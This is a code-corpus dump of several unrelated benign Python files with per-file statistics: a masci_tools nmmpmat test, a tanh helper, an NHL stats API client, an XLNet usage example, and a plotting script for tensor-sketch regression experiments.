nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, 0, 1], [0, 0, 0], [1, 0, 1]])
nmmp_lines = rotate_nmmpmat(xmltree, nmmp_lines, schema_dict, 'Ga-1', orbital=1, phi=0.0, theta=np.pi / 2.0)
nmmp_lines = rotate_nmmpmat(xmltree, nmmp_lines, schema_dict, 'As-2', orbital=1, theta=np.pi / 2.0, phi=np.pi / 4.0)
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_validate_nmmpmat(load_inpxml, test_file):
"""Test validation method of nmmpmat file together with inp.xml file"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat, validate_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
with open(test_file(TEST_NMMPMAT_PATH), mode='r', encoding='utf-8') as nmmpfile:
nmmp_lines_orig = nmmpfile.read().split('\n')
validate_nmmpmat(xmltree, nmmp_lines_orig, schema_dict) #should not raise
#Test number of lines error
nmmp_lines = nmmp_lines_orig.copy()
nmmp_lines.append('0.0')
with pytest.raises(ValueError):
validate_nmmpmat(xmltree, nmmp_lines, schema_dict)
nmmp_lines.remove('0.0')
#Test invalid diagonal element error
nmmp_lines = nmmp_lines_orig.copy()
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=2,
spin=1,
state_occupations=[1, 2, 3, 4, 5])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, -2, 3], [4, -5, 6], [7, -8, 9]])
with pytest.raises(ValueError):
validate_nmmpmat(xmltree, nmmp_lines, schema_dict)
#Test invalid outsied value error
nmmp_lines = nmmp_lines_orig.copy()
nmmp_lines[
0] = ' 0.0000000000000 9.0000000000000 0.0000000000000 0.0000000000000 0.0000000000000 0.0000000000000 0.0000000000000'
with pytest.raises(ValueError):
validate_nmmpmat(xmltree, nmmp_lines, schema_dict)
def prepare_for_file_dump(file_lines):
"""
Join lines together with linebreaks and remove negative zeros
"""
return '\n'.join([line.replace('-0.0000000000000', ' 0.0000000000000') for line in file_lines])
| 40.28655
| 155
| 0.532879
| 786
| 6,889
| 4.40458
| 0.161578
| 0.119584
| 0.083189
| 0.106297
| 0.790872
| 0.748411
| 0.741768
| 0.735413
| 0.735413
| 0.661179
| 0
| 0.05792
| 0.375962
| 6,889
| 170
| 156
| 40.523529
| 0.747383
| 0.092176
| 0
| 0.770492
| 0
| 0.008197
| 0.050314
| 0.010966
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.065574
| 0
| 0.122951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e36adf1af859b2c2c7ede693423d0938adbd3d9
| 108
|
py
|
Python
|
pymul/functions/activation.py
|
mathletedev/pymul
|
f97ac499ceb45755e464445b949d1433fa74f0c3
|
[
"Apache-2.0"
] | 1
|
2021-04-01T23:47:11.000Z
|
2021-04-01T23:47:11.000Z
|
pymul/functions/activation.py
|
mathletedev/pymul
|
f97ac499ceb45755e464445b949d1433fa74f0c3
|
[
"Apache-2.0"
] | null | null | null |
pymul/functions/activation.py
|
mathletedev/pymul
|
f97ac499ceb45755e464445b949d1433fa74f0c3
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
def tanh(x):
return np.tanh(x)
def tanh_prime(x):
return 1 - np.tanh(x) ** 2
| 10.8
| 30
| 0.601852
| 21
| 108
| 3.047619
| 0.52381
| 0.234375
| 0.21875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.259259
| 108
| 9
| 31
| 12
| 0.775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
7e4b4ba555c4af2552b078a3c0f89ea741aa9aac
| 8,584
|
py
|
Python
|
easy_nhl/player.py
|
branks42/easy-nhl
|
cfdfb1434b9cbdd9c71f5aee9cfb255c92c11804
|
[
"MIT"
] | 1
|
2021-04-26T23:59:14.000Z
|
2021-04-26T23:59:14.000Z
|
easy_nhl/player.py
|
branks42/easy-nhl
|
cfdfb1434b9cbdd9c71f5aee9cfb255c92c11804
|
[
"MIT"
] | null | null | null |
easy_nhl/player.py
|
branks42/easy-nhl
|
cfdfb1434b9cbdd9c71f5aee9cfb255c92c11804
|
[
"MIT"
] | null | null | null |
import requests
from .base_url import base_url
class Player():
"""
Player endpoints of the NHL API.
"""
def __init__(self, player_id):
self.player_id = player_id
self.player_url = f"{base_url}/api/v1/people"
def player_info(self):
"""
Get player information.
"""
response = requests.get(f"{self.player_url}/{self.player_id}")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
if "fullName" not in response.json()['people'][0]:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['people'][0]
def season_stats(self, season=None):
"""
Get a player's stats from the provided season
Args:
season (str, optional): Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=statsSingleSeason&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=statsSingleSeason")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def goals_by_game_situation(self, season=None):
"""
Get goals of a given player with details of the game situation in which they were scored.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=goalsByGameSituation&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=goalsByGameSituation")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def win_loss_record(self, season=None):
"""
Get a goalies win loss record for a current season
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=winLoss&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=winLoss")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def home_away_stats(self, season=None):
"""
Get a players stats broken up by home and away games.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=homeAndAway&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=homeAndAway")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_month(self, season=None):
"""
Get a players stats broken up by month.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byMonth&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byMonth")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_day_of_week(self, season=None):
"""
Get a players stats broken up by day of the week.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byDayOfWeek&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byDayOfWeek")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_division(self, season=None):
"""
Get a players stats broken up by division.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsDivision&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsDivision")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_conference(self, season=None):
"""
Get a players stats broken up by conference.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsConference&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsConference")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_team(self, season=None):
"""
Get a players stats broken up by team.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsTeam&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsTeam")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_game(self, season=None):
"""
Get a players stats broken up by game.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=gameLog&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=gameLog")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_standings(self, season=None):
"""
Get a players stats standings.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=regularSeasonStatRankings&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=regularSeasonStatRankings")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_on_pace_for(self):
"""
Get a players projected stats.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=onPaceRegularSeason")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
| 37.814978
| 128
| 0.604264
| 1,089
| 8,584
| 4.653811
| 0.093664
| 0.128256
| 0.094712
| 0.094712
| 0.876677
| 0.873125
| 0.867601
| 0.861681
| 0.861681
| 0.861681
| 0
| 0.010485
| 0.266659
| 8,584
| 226
| 129
| 37.982301
| 0.794599
| 0.208411
| 0
| 0.575472
| 0
| 0
| 0.387723
| 0.254453
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132075
| false
| 0
| 0.018868
| 0
| 0.415094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e859e4f5e0ebbcaceb5318c2ee2db4bb1676fa7
| 150
|
py
|
Python
|
UI/__init__.py
|
SiriYXR/IstaTranslator
|
e3339aa764990f7dbf69796feb609fff3c5f8612
|
[
"Apache-2.0"
] | 6
|
2021-02-13T12:21:56.000Z
|
2022-01-12T08:43:52.000Z
|
UI/__init__.py
|
SiriYXR/IstaTranslator
|
e3339aa764990f7dbf69796feb609fff3c5f8612
|
[
"Apache-2.0"
] | null | null | null |
UI/__init__.py
|
SiriYXR/IstaTranslator
|
e3339aa764990f7dbf69796feb609fff3c5f8612
|
[
"Apache-2.0"
] | 3
|
2021-03-24T13:48:09.000Z
|
2021-08-25T02:33:33.000Z
|
# -*- coding:utf-8 -*-
"""
@author: SiriYang
@file: __init__.py
@createTime: 2021-01-22 16:12:10
@updateTime: 2021-01-22 16:12:10
@codeLines: 0
"""
| 13.636364
| 32
| 0.64
| 24
| 150
| 3.833333
| 0.75
| 0.130435
| 0.173913
| 0.217391
| 0.304348
| 0.304348
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.133333
| 150
| 10
| 33
| 15
| 0.476923
| 0.92
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0e1d0db87267c9bd987a8c86b6a445844425b983
| 218
|
py
|
Python
|
broccoli_server/mod_view/__init__.py
|
KTachibanaM/broccoli-platform
|
31d3ee4246a3c035ed3d1ce8657fa7d4567c3092
|
[
"Apache-2.0"
] | 3
|
2020-12-20T13:14:34.000Z
|
2022-02-12T11:07:38.000Z
|
broccoli_server/mod_view/__init__.py
|
KTachibanaM/broccoli-platform
|
31d3ee4246a3c035ed3d1ce8657fa7d4567c3092
|
[
"Apache-2.0"
] | 50
|
2020-06-05T22:55:49.000Z
|
2022-03-18T05:15:29.000Z
|
broccoli_server/mod_view/__init__.py
|
k-t-corp/broccoli-server
|
16f3966e8391326a5cd5125bb0d5c7306f9e1490
|
[
"Apache-2.0"
] | null | null | null |
from .mod_view_query import ModViewColumn
from .mod_view_query import ModViewQuery
from .mod_view_query import NamedModViewColumn
from .mod_view_renderer import ModViewRenderer
from .mod_view_store import ModViewStore
| 36.333333
| 46
| 0.885321
| 30
| 218
| 6.1
| 0.4
| 0.191257
| 0.300546
| 0.262295
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091743
| 218
| 5
| 47
| 43.6
| 0.924242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e87e5946a4df09bfa605d3b8accaf343dd9b9e5
| 67
|
py
|
Python
|
suzu.py
|
takaakiaoki/suzu
|
431975a5345d9683f0a9453275764693e9e2064e
|
[
"MIT"
] | 6
|
2018-05-05T10:13:11.000Z
|
2021-06-21T02:11:44.000Z
|
suzu.py
|
takaakiaoki/suzu
|
431975a5345d9683f0a9453275764693e9e2064e
|
[
"MIT"
] | null | null | null |
suzu.py
|
takaakiaoki/suzu
|
431975a5345d9683f0a9453275764693e9e2064e
|
[
"MIT"
] | 5
|
2018-05-05T10:13:56.000Z
|
2020-06-15T14:32:45.000Z
|
#!/usr/bin/env python
import suzu
import suzu.run
suzu.run.run()
| 9.571429
| 21
| 0.716418
| 12
| 67
| 4
| 0.583333
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134328
| 67
| 6
| 22
| 11.166667
| 0.827586
| 0.298507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ecb632ad8edf7cbcb8536a68c49ca9bfee3053e
| 35
|
py
|
Python
|
dangie/homepage/__init__.py
|
Aunsiels/dangie
|
7cc13bbae57987c2fce28c411994634bb704cf4a
|
[
"MIT"
] | null | null | null |
dangie/homepage/__init__.py
|
Aunsiels/dangie
|
7cc13bbae57987c2fce28c411994634bb704cf4a
|
[
"MIT"
] | null | null | null |
dangie/homepage/__init__.py
|
Aunsiels/dangie
|
7cc13bbae57987c2fce28c411994634bb704cf4a
|
[
"MIT"
] | null | null | null |
from dangie.homepage import routes
| 17.5
| 34
| 0.857143
| 5
| 35
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ee1db4953f07c0280172160197aa1d70f4bb626
| 4,016
|
py
|
Python
|
intermediate_source/hugging_face/xlnet_test.py
|
jianyiyang5/tutorials
|
4125b852c3baed58359aa760d74534b259f8d9ea
|
[
"BSD-3-Clause"
] | null | null | null |
intermediate_source/hugging_face/xlnet_test.py
|
jianyiyang5/tutorials
|
4125b852c3baed58359aa760d74534b259f8d9ea
|
[
"BSD-3-Clause"
] | null | null | null |
intermediate_source/hugging_face/xlnet_test.py
|
jianyiyang5/tutorials
|
4125b852c3baed58359aa760d74534b259f8d9ea
|
[
"BSD-3-Clause"
] | null | null | null |
from transformers import XLNetTokenizer, XLNetModel
import torch
tokenizer = XLNetTokenizer.from_pretrained('xlnet-large-cased')
model = XLNetModel.from_pretrained('xlnet-large-cased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=False)).unsqueeze(0) # Batch size 1
outputs = model(input_ids)
last_hidden_states = outputs[0] # The last hidden-state is the first element of the output tuple
print(last_hidden_states[0].size())
# from transformers import XLNetTokenizer, XLNetLMHeadModel
# import torch
#
# tokenizer = XLNetTokenizer.from_pretrained('xlnet-large-cased')
# model = XLNetLMHeadModel.from_pretrained('xlnet-large-cased')
# # We show how to setup inputs to predict a next token using a bi-directional context.
# input_ids = torch.tensor(tokenizer.encode("Hello, my dog is very <mask>", add_special_tokens=False)).unsqueeze(0) # We will predict the masked token
# perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float)
# perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token
# target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float) # Shape [1, 1, seq_length] => let's predict one token
# target_mapping[0, 0, -1] = 1.0 # Our first (and only) prediction will be the last token of the sequence (the masked token)
#
# outputs = model(input_ids, perm_mask=perm_mask, target_mapping=target_mapping)
# next_token_logits = outputs[0] # Output has shape [target_mapping.size(0), target_mapping.size(1), config.vocab_size]
# print(next_token_logits.size())
# predicted_index = torch.argmax(next_token_logits[0, -1, :])
# print(predicted_index)
# print(tokenizer.decode([predicted_index.item()]))
from transformers import XLNetTokenizer, XLNetLMHeadModel
import torch
tokenizer = XLNetTokenizer.from_pretrained('xlnet-large-cased')
model = XLNetLMHeadModel.from_pretrained('xlnet-large-cased')
# We show how to setup inputs to predict a next token using a bi-directional context.
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is very <mask>", add_special_tokens=False)).unsqueeze(0) # We will predict the masked token
perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float)
perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token
target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float) # Shape [1, 1, seq_length] => let's predict one token
target_mapping[0, 0, -1] = 1.0 # Our first (and only) prediction will be the last token of the sequence (the masked token)
outputs = model(input_ids, perm_mask=perm_mask, target_mapping=target_mapping)
next_token_logits = outputs[0] # Output has shape [target_mapping.size(0), target_mapping.size(1), config.vocab_size]
# The same way can the XLNetLMHeadModel be used to be trained by standard auto-regressive language modeling.
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is very <mask>", add_special_tokens=False)).unsqueeze(0) # We will predict the masked token
labels = torch.tensor(tokenizer.encode("cute", add_special_tokens=False)).unsqueeze(0)
assert labels.shape[0] == 1, 'only one word will be predicted'
perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float)
perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token as is done in standard auto-regressive lm training
target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float) # Shape [1, 1, seq_length] => let's predict one token
target_mapping[0, 0, -1] = 1.0 # Our first (and only) prediction will be the last token of the sequence (the masked token)
outputs = model(input_ids, perm_mask=perm_mask, target_mapping=target_mapping, labels=labels)
loss, next_token_logits = outputs[:2] # Output has shape [target_mapping.size(0), target_mapping.size(1), config.vocab_size]
print(next_token_logits.size())
predicted_index = torch.argmax(next_token_logits[0, -1, :])
print(predicted_index)
print(tokenizer.decode([predicted_index.item()]))
| 61.784615
| 151
| 0.760209
| 627
| 4,016
| 4.720893
| 0.180223
| 0.079054
| 0.027365
| 0.042568
| 0.853378
| 0.843581
| 0.843581
| 0.819932
| 0.819932
| 0.819932
| 0
| 0.020006
| 0.116285
| 4,016
| 65
| 152
| 61.784615
| 0.814032
| 0.525398
| 0
| 0.4375
| 0
| 0
| 0.09636
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ada32f600da70ae7fe7ed7f4da269102ea1b1951
| 58
|
py
|
Python
|
femb/evaluation/__init__.py
|
jonasgrebe/pt-femb-face-embeddings
|
8f055a59293d75ad60d4b0a92f86ee6f3f07e950
|
[
"MIT"
] | 16
|
2021-04-16T14:57:08.000Z
|
2022-02-23T08:09:39.000Z
|
femb/evaluation/__init__.py
|
jonasgrebe/pt-femb-face-embeddings
|
8f055a59293d75ad60d4b0a92f86ee6f3f07e950
|
[
"MIT"
] | 1
|
2022-01-05T14:10:16.000Z
|
2022-01-06T08:13:13.000Z
|
femb/evaluation/__init__.py
|
jonasgrebe/pt-femb-face-embeddings
|
8f055a59293d75ad60d4b0a92f86ee6f3f07e950
|
[
"MIT"
] | 3
|
2021-04-16T13:41:25.000Z
|
2022-02-23T08:09:42.000Z
|
from .verification_evaluator import VerificationEvaluator
| 29
| 57
| 0.913793
| 5
| 58
| 10.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 58
| 1
| 58
| 58
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
adfaa7792d6dd55af5aa9d52200fb0791b4414ad
| 114
|
py
|
Python
|
atss4po/api_v1/__init__.py
|
kaiueo/atss4po
|
56248339bcb50779e386e25ac04202e2df8b5e10
|
[
"BSD-3-Clause"
] | null | null | null |
atss4po/api_v1/__init__.py
|
kaiueo/atss4po
|
56248339bcb50779e386e25ac04202e2df8b5e10
|
[
"BSD-3-Clause"
] | null | null | null |
atss4po/api_v1/__init__.py
|
kaiueo/atss4po
|
56248339bcb50779e386e25ac04202e2df8b5e10
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import auth # noqa
from . import summary
from . import article
from . import utils
| 22.8
| 26
| 0.675439
| 16
| 114
| 4.8125
| 0.625
| 0.519481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010989
| 0.201754
| 114
| 5
| 27
| 22.8
| 0.835165
| 0.22807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cb6cacca8ce9d805a8fd3155b7d29f06537a4c78
| 7,321
|
py
|
Python
|
analysis/make_plots.py
|
mkbera/tensorsketch
|
2be0a51291e32de815c21bff36571480eff0f363
|
[
"MIT"
] | 2
|
2019-11-09T01:32:22.000Z
|
2019-12-11T04:58:11.000Z
|
analysis/make_plots.py
|
mkbera/tensorsketch
|
2be0a51291e32de815c21bff36571480eff0f363
|
[
"MIT"
] | null | null | null |
analysis/make_plots.py
|
mkbera/tensorsketch
|
2be0a51291e32de815c21bff36571480eff0f363
|
[
"MIT"
] | null | null | null |
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import itertools
import math
import os
ttsketch = ['seg', 'cs', 'srht']
vanilla = 'vanilla'
# mode = 'ttsketch'
mode = 'tensorsketch'
N = [
'512',
# '1024',
# '2048',
]
# D = [4, 8, 16, 32, 64]
D = [4, 8]
V = range(20)
P = [2]
TRIALS = range(20)
K = [4**2, 8**2, 16**2, 32**2, 64**2, 128**2, 256**2]
for n, d, p in itertools.product(N, D, P):
sketch_log_folder = '../tensorsketch/log/O3/'
vanilla_log_folder = '../../../data/vanillaLR/log/O3/vanilla/'
x_axis = list(K)
for i in range(len(K)):
x_axis[i] = int(math.sqrt(x_axis[i]))
gamma = []
sigma = []
sigma_approx = []
sigma_sketch = []
for k in K:
opt_time = 0
opt_eval = 0
for v in V:
file_name = 'n_{}_d_{}_p_{}_v_{}.txt'.format(n, d, p, v)
file_path = vanilla_log_folder + file_name
file = open(file_path, 'r').read().split()
opt_time += float(file[0])
opt_eval += float(file[1])
opt_time /= len(V)
opt_eval /= len(V)
sketch_time = 0
approx_time = 0
approx_eval = 0
count = 0
for v, trial in itertools.product(V, TRIALS):
file_name = 'n_{}_d_{}_p_{}_v_{}_k_{}_trial_{}.txt'.format(n, d, p, v, k, trial)
file_path = sketch_log_folder + file_name
file = open(file_path, 'r').read().split()
sketch_time += float(file[0])
approx_time += float(file[1])
approx_eval += float(file[2])
sketch_time /= (len(V) * len(TRIALS))
approx_time /= (len(V) * len(TRIALS))
approx_eval /= (len(V) * len(TRIALS))
gamma.append(approx_eval/opt_eval - 1)
sigma.append((approx_time+sketch_time)/opt_time)
sigma_approx.append(approx_time/opt_time)
sigma_sketch.append(sketch_time/opt_time)
gamma_ttsketch = {}
sigma_ttsketch = {}
sigma_approx_ttsketch = {}
sigma_sketch_ttsketch = {}
for prog in ttsketch:
gamma_ttsketch[prog] = []
sigma_ttsketch[prog] = []
sigma_approx_ttsketch[prog] = []
sigma_sketch_ttsketch[prog] = []
sketch_log_folder = '../../../data/ttsketch/log/O3/{}/'.format(prog)
for k in x_axis:
opt_time = 0
opt_eval = 0
for v in V:
file_name = 'n_{}_d_{}_p_{}_v_{}.txt'.format(n, d, p, v)
file_path = vanilla_log_folder + file_name
file = open(file_path, 'r').read().split()
opt_time += float(file[0])
opt_eval += float(file[1])
opt_time /= len(V)
opt_eval /= len(V)
sketch_time = 0
approx_time = 0
approx_eval = 0
count = 0
for v, trial in itertools.product(V, TRIALS):
file_name = 'n_{}_d_{}_p_{}_v_{}_k_{}_trial_{}.txt'.format(n, d, p, v, k, trial)
file_path = sketch_log_folder + file_name
file = open(file_path, 'r').read().split()
sketch_time += float(file[0])
approx_time += float(file[1])
approx_eval += float(file[2])
sketch_time /= (len(V) * len(TRIALS))
approx_time /= (len(V) * len(TRIALS))
approx_eval /= (len(V) * len(TRIALS))
gamma_ttsketch[prog].append(approx_eval/opt_eval - 1)
sigma_ttsketch[prog].append((approx_time+sketch_time)/opt_time)
sigma_approx_ttsketch[prog].append(approx_time/opt_time)
sigma_sketch_ttsketch[prog].append(sketch_time/opt_time)
try:
os.makedirs('./plots/{}/'.format(mode))
except:
pass
if (mode == 'tensorsketch'):
plt.plot(x_axis, sigma, color='green', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='tensorsketch')
plt.plot(x_axis, sigma_ttsketch['cs'], color='red', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='cs')
if (mode == 'ttsketch'):
plt.plot(x_axis, sigma_ttsketch['srht'], color='blue', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='srht')
plt.plot(x_axis, sigma_ttsketch['seg'], color='pink', linestyle='dashed', linewidth = 1,
marker='o', markerfacecolor='black', markersize=4, label='seg')
plt.ylim(0, 3.0)
plt.xlabel('K: sketch rows')
